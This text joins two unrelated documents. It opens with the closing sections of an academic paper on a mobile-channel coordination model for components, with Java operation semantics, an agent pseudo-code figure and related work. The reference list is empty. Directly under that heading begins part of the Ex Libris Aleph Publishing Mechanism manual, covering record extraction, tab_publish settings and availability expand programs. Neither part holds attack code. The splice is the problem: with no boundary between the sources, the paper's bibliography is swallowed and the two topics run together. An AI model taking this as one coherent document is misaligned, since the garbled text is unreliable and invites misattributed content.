For every method containing a timeout parameter, there is also a version without the time-out (not listed in the figure). When no time-out is given the thread performing the method suspends indefinitely until the operation succeeds or the method throws an exception. For uniformity of explanation, we assume that the time-out parameter can also have the special value of infinity. This way we need not define two versions of each operation.
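The two-versions convention can be sketched as a pair of overloads, where the no-timeout version delegates to the timed one with "infinity" as its bound. The class and method names below are illustrative, not the actual MoCha signatures:

```java
// Sketch of the convention above: every timed operation also exists without
// a time-out parameter, modeled as a time-out of "infinity".
class TimedOpsSketch {
    static final long INFINITY = Long.MAX_VALUE;

    // No-timeout version: suspend indefinitely until the operation succeeds.
    boolean connect(String channelEnd) {
        return connect(channelEnd, INFINITY);
    }

    // Timed version: a real implementation would block up to timeoutMillis;
    // here we only report success so the delegation pattern is visible.
    boolean connect(String channelEnd, long timeoutMillis) {
        return channelEnd != null;
    }
}
```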
Topological Operations
*CreateChannel* creates a new channel of the specified type. The value of this parameter can be synchronous or asynchronous channels like FIFO, bag, set, etc. The channel-ends, source and sink, are created at the same location as the component and their references are returned as an array of type `Object`: `Object[0] = Source` and `Object[1] = Sink`. We return this array, instead of some `Channel` data-structure containing the channel-end references, in order to avoid introducing new unnecessary data types. If desired, this method can be wrapped to return such a `Channel` class but this is not necessary.
*Connect* connects the specified channel-end `ce` to the component instance that contains the thread that performs this operation. If the channel-end is currently connected to another component instance, then the active entity suspends and waits in a queue until the channel-end is connected to this component instance or, its time-out expires. The method returns `true` to indicate success, or `false` to indicate that it timed-out. When a connect operation is successful and other threads in the same component instance are waiting to connect to the same channel-end, they all succeed. If a thread tries to connect to a channel-end already connected to the component instance, it also immediately succeeds.
When the *Connect* operation succeeds, the channel-end physically moves to the location of the component instance in the network. All channel-ends connected to the component move along with it while they remain connected.
*Disconnect* disconnects the specified channel-end `ce` from the component instance that contains the thread performing this operation. This method *always succeeds* on a valid channel-end. It returns `true` if the channel-end was actually connected to the component instance and `false` otherwise. If `ce` is invalid, e.g. `null`, then the method throws an exception.
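The *Connect*/*Disconnect* semantics described above — exclusive ownership of a channel-end by one component instance, waiting with a time-out, immediate success when already connected, and waiters released on disconnect — can be sketched with a Java monitor. This is our own illustration, not the MoCha implementation:

```java
// Hypothetical sketch of Connect/Disconnect semantics: a channel-end is held
// by at most one component instance; connecting threads wait until release
// or until their time-out expires.
class ChannelEndSketch {
    private Object owner; // component instance currently holding this end

    synchronized boolean connect(Object component, long timeoutMillis)
            throws InterruptedException {
        if (owner == component) return true; // already connected: succeed now
        long deadline = System.currentTimeMillis() + timeoutMillis;
        while (owner != null) {
            long remaining = deadline - System.currentTimeMillis();
            if (remaining <= 0) return false; // timed out
            wait(remaining);
        }
        owner = component;
        return true;
    }

    synchronized boolean disconnect(Object component) {
        // Always succeeds on a valid end; reports whether it was actually held.
        if (owner != component) return false;
        owner = null;
        notifyAll(); // wake all waiters
        return true;
    }
}
```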
Input/Output Operations
*Write* suspends the thread that performs this operation until either the `Object var` is written into the channel-end `ce`, or its specified time-out expires. Only `Serializable` objects, channel-end identities, and component locations can be written into a channel. The `Serializable` objects are copied before being inserted into the channel; therefore, no references to the internal objects of a component can be sent through channels. The method returns the value `true` if the operation succeeds, and the value `false` if its time-out expires. The method throws an exception if `ce` is invalid, the component instance is not connected to the channel-end, the `Object var` is not `Serializable`, or it contains a reference to a non-`Serializable` object.
*Read* suspends the thread that performs this operation until a value is read from the sink channel-end `ce`, or its specified time-out expires. In the first case, the method returns a `Serializable Object`, a channel-end identity, or a `Location`. In the second case the method returns the value `null`. The value is not removed from the channel. The method throws an exception if either `ce` is not valid, or the component instance is not connected to the channel-end.
*Take* is the destructive variant of the *Read* operation. It behaves the same as a *Read* except that the read value is also removed from the channel.
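The difference between *Read* and *Take* can be illustrated on a FIFO buffer: read peeks at the next value, take removes it as well. The class below is our own sketch, not the MoCha channel implementation:

```java
import java.util.ArrayDeque;
import java.util.Queue;

// Illustrative FIFO channel buffer showing Read vs. Take semantics.
class FifoChannelSketch {
    private final Queue<Object> buffer = new ArrayDeque<>();

    void put(Object v) { buffer.add(v); }

    // Read: non-destructive, the value stays in the channel.
    Object read() { return buffer.peek(); }

    // Take: destructive variant, the value is also removed.
    Object take() { return buffer.poll(); }
}
```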
Inquiry Operations
*Wait* is the inquiry operation. It suspends the thread that performs it until either the conditions specified in *conds* become true or its time-out expires. In the first case the method returns *true*, and otherwise it returns *false*. The channel-ends involved in *conds* need not be connected to the component instance in order to perform this operation, but an invalid channel-end reference throws an exception. The argument *conds* is a boolean combination of primitive channel conditions such as *connected(ce)*, *disconnected(ce)*, *empty(ce)*, *full(ce)*, etc.
5.6. A Small Example
We use a simple implementation of the mobile agent component of the example in section 3 to show the utility of the coordination operations provided by our model. Figure 9 shows the Java pseudo-code for this agent. *AgentInterface* is the agent’s interface and consists of the basic interface plus a method *Move*. This method moves the agent to the specified location, together with the channel-ends it is connected to (*readChannelEnd*, *writeChannelEnd*, and *channel[1]*). The *readChannelEnd* and *writeChannelEnd* channel-ends are, respectively, the sink and the source of the channels for interaction with the component U. The agent has a list containing the locations of the information sources it is expected to visit, together with their respective source channel-end references where it can issue its requests.
```java
void agentImplementation()
{
    AgentInterface.Connect(readChannelEnd);
    AgentInterface.Connect(writeChannelEnd);
    Object[] channel = AgentInterface.CreateChannel(FIFOchannel);
    AgentInterface.Connect(channel[1]);
    for each entry in informationSourceList do
        AgentInterface.Move(entry.location, channel[1]);
        AgentInterface.Connect(entry.sourceEnd);
        AgentInterface.Write(entry.sourceEnd, REQUEST + channel[0]);
        AgentInterface.Disconnect(entry.sourceEnd);
        information.add(AgentInterface.Read(channel[1]));
        information.transformation();
        AgentInterface.Write(writeChannelEnd, information);
        String cond = "notEmpty( " + readChannelEnd + " )";
        information.clear();
        if ( AgentInterface.Wait(cond, 0) ) then
            // read an instruction from readChannelEnd and process it
        fi
    od
    AgentInterface.Disconnect(readChannelEnd);
    AgentInterface.Disconnect(writeChannelEnd);
}
```
Figure 9. Simple Implementation of The Mobile Agent
6. Related Work and Conclusion
In this paper we presented a coordination model for component-based software based on mobile channels. The idea of using (mobile) channels for components has its foundations in the earlier work of some of the authors of this paper, e.g., in [5], [6].
Our model provides a clear separation of concerns between the coordination and the computational aspects of a system. We force a component to have an interface for its interaction with the outside world, but we do not make any assumptions about its internal implementation. We define the interface of a component as a dynamic set of channel-ends. Channels provide an anonymous means of communication, where the communicating components need not know each other, or the structure of the system. The architectural expressiveness of channels allows our model to easily describe a system in terms of the interfaces of its components and its channel connections, abstracting away their computational aspects. Coordination is expressed merely as operations performed on such channels. The mobility of channels allows dynamic reconfiguration of channel connections within a system.
The PICCOLA project [1] is related to our work. PICCOLA is a language for composing applications from software components. It has a small syntax and a minimal set of features needed for specifying different styles of software composition, e.g. pipes and filters, streams, events, etc. At the bottom level of PICCOLA there is an abstract machine that considers components as agents. These agents are based on the $\pi$-calculus, but they communicate with each other by sending forms through shared channels instead of tuples. Forms are a special notion of extensible, immutable records. In comparison with PICCOLA, our coordination model can be seen as a possible mobile channel style for component composition. Therefore, the interfaces of our components are defined in such a way that they already fit within this style. Because our model only focuses on the mobile channel style, it is much simpler to use when this style is desired. However, our model is not just a style but also, like PICCOLA, a composition language.
Certain aspects of and concerns in ROOM [27] and Darwin [21], two architectural description languages (ADL), are related to our work. In ROOM components are described by declaring their internal structures, their external interfaces, and the behavior of their sub-components (if they are composite components). The interface of a component is a set of ports. A port is the place where components offer or require certain services. The communication through these ports is bidirectional and in the form of asynchronous messaging. The components of Darwin are similar to the ones of ROOM, but instead of ports, Darwin components have portals. These portals specify the input and output of a component in terms of services, as in ROOM. However, the binding of portals is not specified, leaving them open for all kinds of possible bindings. Another difference between Darwin and ROOM, is that Darwin can describe dynamically changing systems, while ROOM can describe only static ones. This makes Darwin more suitable than ROOM for component-based systems that use our coordination model. Of course, to model mobile channels or the dynamic set of interfaces of a component, for instance, some extensions to Darwin would be necessary.
Other models for component-based software can benefit from the coordination model presented in this paper, because ours is a basic model that focuses only on the coordination of components. Our model can extend other models that are concerned with other aspects of components, for example, their internal implementation, their evolution, etc.
Because our model provides exogenous coordination (see section 2.3), it opens the possibility to apply more powerful coordination paradigms that are based on the notion of mobile channels to component-based software. One such paradigm is Reo [3, 4]. Reo supports composition of channels into complex connectors whose semantics are independent of the components they connect. We are currently extending our coordination model for component-based systems in order to support all the features of Reo.
Finally, although it is not the main purpose of this paper, the Java implementation presented in section 5 shows not only that components can be implemented using object-oriented languages, but also how this can be done. This demonstrates that a clear integration of components is possible in object-oriented paradigms such as UML.
References
Aleph Publishing Mechanism
Version 16 and later
CONFIDENTIAL INFORMATION
The information herein is the property of Ex Libris Ltd. or its affiliates and any misuse or abuse will result in economic loss. DO NOT COPY UNLESS YOU HAVE BEEN GIVEN SPECIFIC WRITTEN AUTHORIZATION FROM EX LIBRIS LTD.
This document is provided for limited and restricted purposes in accordance with a binding contract with Ex Libris Ltd. or an affiliate. The information herein includes trade secrets and is confidential.
DISCLAIMER
The information in this document will be subject to periodic change and updating. Please confirm that you have the most current documentation. There are no warranties of any kind, express or implied, provided in this documentation, other than those expressly agreed upon in the applicable Ex Libris contract. This information is provided AS IS. Unless otherwise agreed, Ex Libris shall not be liable for any damages for use of this document, including, without limitation, consequential, punitive, indirect or direct damages.
Any references in this document to third-party material (including third-party Web sites) are provided for convenience only and do not in any manner serve as an endorsement of that third-party material or those Web sites. The third-party materials are not part of the materials for this Ex Libris product and Ex Libris has no liability for such materials.
TRADEMARKS
"Ex Libris," the Ex Libris bridge, Primo, Aleph, Alephino, Voyager, SFX, MetaLib, Verde, DigiTool, Preservation, URM, Voyager, ENCompass, Endeavor eZConnect, WebVoyage, Citation Server, LinkFinder and LinkFinder Plus, and other marks are trademarks or registered trademarks of Ex Libris Ltd. or its affiliates.
The absence of a name or logo in this list does not constitute a waiver of any and all intellectual property rights that Ex Libris Ltd. or its affiliates have established in any of its products, features, or service names or logos.
Trademarks of various third-party products, which may include the following, are referenced in this documentation. Ex Libris does not claim any rights in these trademarks. Use of these marks does not imply endorsement by Ex Libris of these third-party products, or endorsement by these third parties of Ex Libris products.
Oracle is a registered trademark of Oracle Corporation.
UNIX is a registered trademark in the United States and other countries, licensed exclusively through X/Open Company Ltd.
Microsoft, the Microsoft logo, MS, MS-DOS, Microsoft PowerPoint, Visual Basic, Visual C++, Win32, Microsoft Windows, the Windows logo, Microsoft Notepad, Microsoft Windows Explorer, Microsoft Internet Explorer, and Windows NT are registered trademarks and ActiveX is a trademark of the Microsoft Corporation in the United States and/or other countries.
Unicode and the Unicode logo are registered trademarks of Unicode, Inc.
Google is a registered trademark of Google, Inc.
Copyright Ex Libris Limited, 2017. All rights reserved.
Document released: December 2016
Web address: http://www.exlibrisgroup.com
# Table of Contents
GENERAL: PURPOSE AND SCOPE
1 CREATING AND UPDATING POPULATION SETS VIA EXTRACT PROCESS
  1.1 Initial Extract Process
  1.2 Ongoing Extract Process
    1.2.1 UE_21 and UE_22
  1.3 Retrieval of Repository Records
  1.4 Adding Published Sets
  1.5 The tab_publish table: Specifications for the Extraction of ALEPH Records
2 EXPAND PROGRAMS RELATED TO PUBLISHING
  2.1 expand_doc_bib_avail
  2.2 expand_doc_bib_avail_hol
  2.3 expand_doc_del_fields
  2.4 expand_doc_bib_accref_1
3 NOTES ON IMPLEMENTING THE PUBLISHING MECHANISM FOR PRIMO
  3.1 General
  3.2 Setup for MAB Records Extract
    3.2.1 $data_tab/tab_publish
    3.2.2 $data_tab/tab-expand
    3.2.3 $data_tab/tab_fix and corresponding tab_fix_convit_ref_pm
4 TECHNICAL INFORMATION FOR THE ALEPH PUBLISHING MECHANISM
  4.1 Information Required for the Maintenance of the Z00P Oracle Table
    4.1.1 Disk Space, Definitions, and Basic Concepts
    4.1.2 Oracle Recommendations
  4.2 Initial Publishing Process (publish-04) Parallelism Recommendations
  4.3 Implementation Notes
    4.3.1 Z00P/Z07P Creation
    4.3.2 Configuration Table
    4.3.3 JAVA Environment Configuration
    4.3.4 Daemon Handling
    4.3.5 Availability Updates
    4.3.6 Additional Notes
General: Purpose and Scope
The objective of the functionality that is described in this document is to implement a simple mechanism that allows sites to extract records from the ALEPH catalog for publishing purposes (for example, for publishing to search engines and search tools such as Google and Primo).
This publishing platform includes the extraction of population sets for different purposes from a bibliographic or authority library into a repository. The repository is constantly updated. Records can be retrieved from the repository by an external system such as Primo.
This document describes the flow and setup needed for successful publishing.
1 Creating and Updating Population Sets via Extract Process
The extract process has two different flows: initial and ongoing. The initial extract usually includes all records in the catalog, while the ongoing extract mainly deals with new and updated records.
Both publishing processes place the documents into the data repository which is stored in the Z00P Oracle table of the USR library.
Note that the extract process can be performed on the whole database or on specific logical bases. The extract process creates different population sets which are stored in separate Z00P records.
In addition, extracted records can be modified to include information added by standard ALEPH procedures such as FIX and EXPAND.
1.1 Initial Extract Process
The initial extract process is performed by running Initial Publishing Process (publish-04). This service can be run from the Publishing submenu of the Services menu in the Cataloging module.
The selected range of records for the specified population set is extracted (ALL is for all sets specified by the System Librarian).
The extraction (initial and ongoing) is performed according to the `tab_publish` table located under the `tab` directory of the library that contains the records to be extracted (for example, USM01). For more details on how to configure the publishing process, see Section 1.4 Adding Published Sets.
If **Initial Publishing Process (publish-04)** tries to upload an invalid xml (containing bibliographic information), a file is written under the `$alephe_scratch` directory. Its name is `publish_04`. The file contains the document number and the library of the document which was not updated due to the invalid xml.
**Note:** **Initial Publishing Process (publish-04)** works only if the Z00P of the selected population set and its selected record range under the library in which `publish_04` is activated are empty.
In order to delete ALEPH published records that were extracted from the ALEPH catalog for publishing purposes, **Delete ALEPH Published Records (publish-05)** can be used. It has the following parameters: Publishing set, range of records, and number of processes to be created. The selected range of records for a specified set is deleted from Z00P regardless of the original library from which they were extracted.
Note that in order to delete all the sets at once, util/a/17/1 on the Z00P table should be used.
If a change is made to a base or to a base definition in tab_base.lng and this base exists in tab_publish, Delete ALEPH Published Records (publish-05) and Initial Publishing Process (publish-04) should be run to create the initial load again. UE_21 should be restarted.
1.2 Ongoing Extract Process
The ongoing extract process is required in order to reflect changes to the database such as the deletion of records and updates to the bibliographic records/holdings records/item records, etc. The ongoing extract process has two main stages:
- The trigger for the extract
- The creation/update of repository records
The triggering mechanism for the extract is based on the ALEPH indexing trigger mechanism. In ALEPH, a Z07 record is created for each new or modified record. In the ongoing extract process, when a Z07 record is created for a bibliographic record, the system creates a Z07P record. The Z07P is the trigger for the ongoing extract process.
Note that the creation of Z07P records depends on whether tab_publish exists in the bibliographic and/or authority library. If the table does not exist, no Z07P records are created.
Z07 records are created for bibliographic records in various cases such as changes to the related holdings records, authority records, items, etc. This ensures that bibliographic records are indexed not only according to their own data but also according to associated data. Since the Z07P is based on the Z07, it guarantees that
the extracted records, which might contain information derived from FIX and EXPAND procedures, are correctly updated.
Z07p records are also created when an item is loaned, returned, or its hold request status is changed to S (On Hold Shelf).
Z07P records are also created for repository records (Z00P) that no longer belong to a set (for example, because their corresponding bibliographic record has been deleted or its base has changed). In this case the Z00P record receives a DELETED status.
The timing of the creation of the trigger record (Z07P) differs depending on whether or not the population set is created based on a logical base. If the population set is not base-dependent, the Z07P is created immediately after the creation of the Z07 record (before it is processed by the UE_01 indexing daemon). If the population set is base-sensitive, the record must be indexed before it is extracted. In this case, the Z07P record is created only after the Z07 record has been processed by the UE_01 daemon. The reason for this difference is that in sites where the population sets are not base-sensitive there is no reason to wait for the indexing of the records in order to start the ongoing extract process.
Note that the timing of the creation of the Z07P records explained above is not dependent on the specific population set but depends on whether there is at least one entry in the tab_publish table (see Section 1.4 Adding Published Sets) that is base dependent. If, for example, there are four population sets defined in the table but only one is base sensitive, then for all sets the Z07P record is created after the processing of the UE_01 daemon.
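The timing rule above is global rather than per-set: one base-sensitive entry in tab_publish delays Z07P creation for all sets until after UE_01 processing. This decision reduces to a simple predicate, sketched here in Java (the names are ours, not ALEPH internals):

```java
import java.util.List;

// Sketch of the Z07P timing rule: if at least one published set in
// tab_publish is base-sensitive, ALL Z07P records are created only after
// the Z07 has been processed by the UE_01 indexing daemon; otherwise they
// are created immediately after the Z07.
class Z07pTimingSketch {
    // true = create Z07P after UE_01 processing, false = create immediately
    static boolean createAfterIndexing(List<Boolean> setIsBaseSensitive) {
        return setIsBaseSensitive.contains(Boolean.TRUE);
    }
}
```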
1.2.1 UE_21 and UE_22
The handling of the changed Z00P records is performed by the Ongoing Publishing utility, UE_21. This utility compares the Z00P record, for which the Z07P was created, with the Z00P record in the repository. If the records differ (after EXPAND and FIX), the Z00P record is handled/changed. When the service finishes processing the triggered documents, the Z07P records are deleted.
The Ongoing Publishing utility, UE_21, should be run on a regular basis in order to ensure that the repository is up to date. The Stop Update Publishing Data utility, UE_22, stops UE_21.
If UE_21 tries to upload an invalid xml (containing bibliographic information), a file is written under the library’s data_scratch directory with the following name convention: util_e_21.xml.err.<YYYYMMDD>.<HHMMSSmm>. The file contains the document number and the library of the document which was not updated due to the invalid xml. The library staff should check for these files every couple of days and handle them.
The performance of UE_21 can be improved by setting the num_ue_21_processes variable, which enables you to divide the running of the job into several processes. The variable can be set in aleph_start or in the prof_library file of the publishing library. Setting the variable in $alephe_root/aleph_start or aleph_start.private affects all of the publishing libraries. Setting it in $data_root/prof_library of the publishing library affects only that library.
### 1.3 Retrieval of Repository Records
The changes triggered by Z07P update the Z00P records. **Create Tar File for ALEPH Published Records (publish-06)** can take the updated Z00P records based on dates, record numbers, and an input file and create a tar file for them. This file can be later transferred to different publishing platforms.
If an error occurs while trying to extract a document into the tar file, then that document number is written in an error file. The error file is placed under the library’s data_scratch directory.
The name of the file includes the name of the publishing set to which the document belongs and the date and time of the failed extraction. For instance: p_publish_06.err.<Publishing set name>.YYYYMMDDHHMMSSmm. The file includes the document numbers of the failed documents in the format of <Doc Number><Library>, for example 000052114USM01.
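The entry format described above — a nine-digit zero-padded document number followed by the library code — can be reproduced with a short helper. The class and method names are ours, for illustration only, not an ALEPH API:

```java
// Illustrative reconstruction of the publish-06 error-file entry format:
// <Doc Number><Library>, with the document number zero-padded to 9 digits,
// e.g. 000052114USM01.
class Publish06ErrorEntry {
    static String entry(int docNumber, String library) {
        return String.format("%09d%s", docNumber, library);
    }
}
```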
1.4 Adding Published Sets
The recommended process of adding new published sets is as follows:
1. Set up the tab_publish table (see Section 1.5) with the required definitions of the new set.
2. Run Initial Publishing Process (publish-04). Use the new set name as the parameter, and run the service on all of the documents in the range.
3. Run Create Tar File for ALEPH Published Records (publish-06). Use the new set name as the parameter and run the service on all of the documents in the range.
4. Make sure that Create Tar File for ALEPH Published Records (publish-06) is set in the job_list for execution at your desired frequency, includes the new set, and is run with the "from last handled date" parameter.
1.5 The tab_publish table: Specifications for the Extraction of ALEPH Records
Both the initial and the ongoing extract process perform the creation and update of records based on the specifications defined in the tab_publish table. Note that the retrieval of repository records does not use this table.
The tab_publish table must be located under the tab directory of the library that contains the records to be extracted (in most cases this is the bibliographic and/or the authority libraries).
Following is a sample from the tab_publish table:
```
! 1        2               3               4           5
!!!!!!!!-!!!!!!!!!!!!!!!-!!!!!!!!!!!!!!!-!!!!!!!!!!!-!!!!!!!!!!!!!!!-
TOTAL                      N               ALL         MARC_XML
MEDICINE   MED             N               MED         MARC_XML
LAW        LAW             N               LAW         MARC_XML
```
Key to the Table:
**Column 1 – Publishing Set**
This column contains the code of the publishing set of records to be extracted. For example, if the database needs to be extracted in two separate formats for two separate publishing platforms (such as Google and Primo) then two separate sets should be defined in the table. Note that the code must be in upper case.
**Column 2 – Base**
A set can be the entire database or a section of the database as defined by a logical base. This column contains the code of the desired logical base from the tab_base.lng table. If the column is left blank, the entire database is extracted for the set.
**Column 3 - De-duplication (for future use)**
This column is currently not in use.
**Column 4 - Fix and Expand Code**
This column contains the fix and expand code of the routines that should be applied before the record is extracted.
**Column 5 - Repository Format**
This column determines the format of the records in the repository. Currently the supported formats are:
- MARC_XML
- MAB_XML
- OAI_DC_XML (available for ALEPH version 18 and up)
- OAI_MARC21_XML (available for ALEPH version 18 and up)
- HTML (available for ALEPH version 18 and up)
Following is a sample of a record in MAB-XML format:
```xml
<record xmlns="http://www.db.de/professionell/mabxml/mabxml-1.2.1a">
  <header>
    <identifier>mab-publish:000000006</identifier>
  </header>
  <metadata>
    <controlfield tag="001" nds="2">
      <subfield code="6">Bancroft, Hubert H.</subfield>
    </controlfield>
    <datafield tag="100" ind1="1" ind2="2">
      <subfield code="a">Bancroft, Hubert H.</subfield>
      <subfield code="8">Bibliography</subfield>
    </datafield>
    <datafield tag="300" ind1="1" ind2="2">
      <subfield code="a">The history of California, vol. 4. 1846 - 1847</subfield>
    </datafield>
    <datafield tag="410" ind1="1" ind2="2">
      <subfield code="a">San Francisco</subfield>
    </datafield>
  </metadata>
</record>
```
Note that when a document is removed from a base or deleted, a status attribute is added to the header tag of the extracted document for the specific base:
```xml
<header status="deleted">
  <identifier>aleph-publish:000000006</identifier>
</header>
```
2 Expand Programs Related to Publishing
The following new expand programs serve the publishing process.
2.1 expand_doc_bib_avail
The expand program, `expand_doc_bib_avail`, provides item and holdings availability information. For each HOL record, an AVA line is created with the holdings information and its availability. The information is presented in the AVA field, which has the following subfields:
- **$a**: ADM library code
- **$b**: Sub library code
- **$c**: Collection – If there are several items in different collections in one sub library, only one collection of the sub library is presented.
- **$d**: Call Number – If there are several items in different collections in one sub library, only one call number in the collection is presented.
- **$e**: Availability status – Can be available, unavailable, or check_holdings. Available is assigned only when it is certain that there is an on-shelf item. Unavailable is assigned only when it is certain that there is no on-shelf item. check_holdings is assigned in all other cases (for example, the number of items is larger than the THRESHOLD, or there are holdings but no items attached).
- **$f**: Number of Items (for the entire sub library not just location).
- **$g**: Number of unavailable items (for the entire sub library not just location).
- **$h**: Multi-volume flag (Y/N) – If first item’s Z30-ENUMERATION-A is not blank or 0 then =Y otherwise = N.
- **$i**: Number of History loans (for the entire sub library not just location).
- **$j**: Collection code – If there are several items in different collections in one sub library, only one collection of the sub library is presented.
An item is unavailable if it matches one of the following conditions:
- It is on loan (it has a Z36).
- It is on hold shelf (it has Z37_status=S).
- Items with process statuses are considered unavailable.
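The $e status rules above can be sketched as follows. This is our own reading of the documented behavior, not the ALEPH implementation; `num_unavailable` stands for items that are on loan, on the hold shelf, or in a process status not whitelisted via the AVA= parameter described below.

```python
# Sketch of the $e availability decision (our reading, not ALEPH source).
def availability_status(num_items, num_unavailable, threshold=10):
    if num_items > threshold:
        return "check_holding"   # above THRESHOLD: no availability check
    if num_items == 0:
        return "check_holding"   # e.g. holdings but no items attached
    if num_items - num_unavailable > 0:
        return "available"       # at least one on-shelf item for certain
    return "unavailable"         # no on-shelf item for certain

print(availability_status(3, 1))    # available
print(availability_status(2, 2))    # unavailable
print(availability_status(0, 0))    # check_holding
print(availability_status(80, 0))   # check_holding (default THRESHOLD is 010)
```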
Column 3 of tab_expand can be used to specify:
- A threshold for checking availability. If the number of items in the sublibrary exceeds the threshold defined in this parameter, then no availability check is performed and the availability is reported as check_holding. This value is set by setting column 3 of the tab_expand line with:
THRESHOLD=xxx.
For example:
```
AVAIL expand_doc_bib_avail THRESHOLD=050
```
The default threshold is 010.
- Item process statuses whose items should be treated as available. This value is set by setting column 3 of the tab_expand line with:
```
AVA=xx,yy
```
Where xx and yy are the process statuses that are regarded as available. For example:
```
AVAIL expand_doc_bib_avail AVA=BD,NW
```
- Retrieve availability information by collection (in addition to sublibrary). This value is set by setting column 3 of the tab_expand line with:
```
COLLECTION=Y
```
If several parameters are to be defined, a semicolon must separate them, and the threshold must be defined first. For example:
```
AVAIL expand_doc_bib_avail THRESHOLD=050;AVA=BD,NW
```
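A column 3 string of the form shown above can be parsed as follows. This is an illustrative sketch with names of our own choosing, not ALEPH code; it assumes the semicolon-separated KEY=VALUE layout documented above.

```python
# Hypothetical parser for a tab_expand column 3 string such as
# "THRESHOLD=050;AVA=BD,NW;COLLECTION=Y".
def parse_expand_params(col3):
    params = {}
    for part in filter(None, col3.split(";")):
        key, _, value = part.partition("=")
        key = key.strip().upper()
        if key == "THRESHOLD":
            params[key] = int(value)          # "050" -> 50
        elif key == "AVA":
            params[key] = value.split(",")    # statuses treated as available
        else:
            params[key] = value
    return params

print(parse_expand_params("THRESHOLD=050;AVA=BD,NW"))
# {'THRESHOLD': 50, 'AVA': ['BD', 'NW']}
```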
**Note:**
Information from suppressed HOL records (STA field is SUPPRESSED) is not expanded.
Items that are defined in tab15 as not OPAC displayable (column 10) are not included in the expand.
### 2.2 expand_doc_bib_avail_hol
The expand program, expand_doc_bib_avail_hol, provides holdings and item availability information, based on the Holdings record's 852 field and subfields.
The information is presented in the AVA field which has the following sub fields:
- **$$a** ADM library code
- **$$b** Sub library code, based on the 852$$b of the HOL record
- **$$c** Collection text, based on the 852$$c of the HOL record
- **$$d** Call Number - The HOL record’s 852 subfields which are set in aleph_start variable: correct_852_subfields (can be 1 or more of the following subfields: hijklm)
- **$$e** Availability status – Can be “available”, “unavailable”, “check_holdings”, or “temporary_location”. Available is assigned if the total number of items minus unavailable items is positive. Unavailable is assigned if the total number of items minus unavailable items is zero or negative. If a record has no linked items (only Holdings records), the status is “check_holdings”. If all the items linked to the Holdings record are in a temporary location, the status is “temporary_location”. This subfield can be affected by the value of the THRESHOLD parameter in column 3 of tab_expand.
- **$$f** The number of items that are linked to the HOL record. If no items are linked to the HOL record, it is set to 0.
- **$$g** The number of unavailable items (for the entire sub library, not just location) that are linked to the HOL record. If no items are linked to the HOL record, it is set to 0.
- **$$h** Multi-volume flag (Y/N) – If the first item’s Z30-ENUMERATION-A is not blank or 0, then Y; otherwise N.
- **$$i** The number of loans (for the entire sub library, not just location), based on the HOL record’s linked items. If no item is linked, it is set to 0.
- **$$j** Collection code (852$$c of the HOL record).
- **$$k** Call Number type – the first indicator of 852. If the first indicator of field 852 in the holdings record is 7, the value of 852 subfield $$2 is copied to AVA$$k.
- **$$p** Location priority – a number that represents the priority of the item by its location. The expand_doc_bib_avail_hol routine consults ./bib_lib/tab/ava_location_priority and creates AVA$$p with a number that represents the location priority. If there is no match with the ava_location_priority table, no subfield p is created. If there are, for example, two HOL records with the same sublibrary + collection values, then two AVA$$p subfields are created with the same priority rank.
- **$$t** Availability text translation – contains a translation of the content of subfield $$e (availability status), according to the text of the messages entered in table ./error_lng/expand_doc_bib_avail (the same one used by expand_doc_bib_avail).
- **$$7** Holdings ID – contains the HOL library code and the HOL record number (e.g. USM60000000741) for which the AVA is created. Not relevant for AVA fields of items with no linked HOL record.
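The $$e rules above for expand_doc_bib_avail_hol can be sketched per linked HOL record as follows. This is our own reading of the documented behavior, not the ALEPH source; parameter names are ours.

```python
# Sketch of the $$e decision for expand_doc_bib_avail_hol (our reading):
# evaluated per HOL record over its linked items.
def hol_availability(num_items, num_unavailable, all_in_temp_location=False):
    if num_items == 0:
        return "check_holdings"       # HOL record with no linked items
    if all_in_temp_location:
        return "temporary_location"   # every linked item is in a temp location
    if num_items - num_unavailable > 0:
        return "available"            # total minus unavailable is positive
    return "unavailable"              # total minus unavailable is zero or less

print(hol_availability(0, 0))           # check_holdings
print(hol_availability(4, 1))           # available
print(hol_availability(2, 3))           # unavailable
print(hol_availability(2, 0, True))     # temporary_location
```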
**Routine Additional Parameters**
To define additional subfields added to the AVA fields from the 852 field of the HOL record, set the parameter SF in column 3 of tab_expand (for example: SF=z,t to copy subfields $$z and $$t). Note that the additional subfields copied from the HOL record's 852 to the AVA field override the subfields created by this expand program.
To define the maximum number of items to check per sublibrary, set the following parameter in column 3 of tab_expand: THRESHOLD=080. In this example, the maximum number of items per sublibrary is 80. Note that the number set in this parameter must have three digits. This parameter affects the content of subfield $$e (availability status) and subfield $$t (translation of $$e).
Items with process statuses are considered “unavailable” by default. To define item process statuses whose items should be treated as “available”, set the following parameter in column 3 of tab_expand: AVA=BD,MK. It is possible to specify more than one process status, delimited by a comma (“,”).
If you want reshelving time to be taken into account, set the following parameter in column 3 of tab_expand: RESHELVING=Y. This is mostly relevant for the Real Time Availability functionality (availability X-service).
For example:
```
! 1     2                                3
!!!!!-!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!>
FULLP expand_doc_bib_avail_hol           THRESHOLD=050;AVA=BD,NW;SF=z,t
```
In this example:
The THRESHOLD parameter limits the number of items per sublibrary to 50.
The AVA parameter defines items with process status BD or NW as available.
The SF parameter adds 852$$z and 852$$t to AVA$$z and AVA$$t. The SF parameter supports multiple subfield occurrences.
**Note:**
For items that are not related to any HOL records, an AVA field is created for each sublibrary and collection combination similar to expand_doc_bib_avail, as if COLLECTION=Y is defined and without consulting the SF parameter.
### 2.3 expand_doc_del_fields
This expand program deletes all the fields in the record except the fields specified in Col.3 of tab_expand. The fields in Col.3 are separated by a comma.
Example:
```
! 1     2                                3
!!!!!-!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!>
TEST  expand_doc_del_fields              245##,260##,500##,AVA##
```
Only 245##, 260##, 500## and AVA## fields are retained.
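The filtering above can be sketched as follows, assuming (our reading) that “#” acts as a single-character wildcard over the tag-plus-indicators string, so that “245##” matches “24510”. The helper name is ours, not part of ALEPH.

```python
from fnmatch import fnmatchcase

# Sketch of expand_doc_del_fields' filtering: keep only fields whose
# tag+indicators match one of the comma-separated patterns, treating
# "#" as a single-character wildcard (assumption: "245##" matches "24510").
def keep_fields(tags, col3):
    patterns = [p.replace("#", "?") for p in col3.split(",")]
    return [t for t in tags
            if any(fnmatchcase(t, pat) for pat in patterns)]

tags = ["24510", "26001", "1001 ", "65004", "AVA01"]
print(keep_fields(tags, "245##,260##,500##,AVA##"))
# ['24510', '26001', 'AVA01']
```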
